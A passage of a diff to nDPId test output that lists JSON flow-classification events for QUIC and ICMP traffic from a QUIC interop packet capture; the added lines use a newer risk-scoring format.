-00746{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00632{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816435054,"flow_last_seen":1603816435054,"flow_idle_time":120000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP.Azure","breed":"Acceptable","category":"Network"}}
-00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816435020,"flow_last_seen":1603816435194,"flow_idle_time":120000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00753{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434685,"flow_last_seen":1603816434779,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00764{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434784,"flow_last_seen":1603816434822,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434661,"flow_last_seen":1603816434997,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
-00763{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434602,"flow_last_seen":1603816434650,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434585,"flow_last_seen":1603816434765,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434518,"flow_last_seen":1603816434566,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00751{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434535,"flow_last_seen":1603816444528,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00765{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434725,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00764{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434764,"flow_last_seen":1603816434897,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434772,"flow_last_seen":1603816434831,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434680,"flow_last_seen":1603816434845,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434670,"flow_last_seen":1603816444524,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00763{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434528,"flow_last_seen":1603816434679,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00756{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434595,"flow_last_seen":1603816435011,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816434609,"flow_last_seen":1603816434806,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1668,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434569,"flow_last_seen":1603816434601,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434750,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434806,"flow_last_seen":1603816435089,"flow_idle_time":120000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":309,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00765{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434678,"flow_last_seen":1603816434822,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434524,"flow_last_seen":1603816444507,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
-00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434680,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434656,"flow_last_seen":1603816435111,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00751{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434729,"flow_last_seen":1603816444586,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434507,"flow_last_seen":1603816444490,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434765,"flow_last_seen":1603816435194,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434648,"flow_last_seen":1603816434782,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":643,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434587,"flow_last_seen":1603816444528,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434523,"flow_last_seen":1603816434855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
+00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434629,"flow_last_seen":1603816434766,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
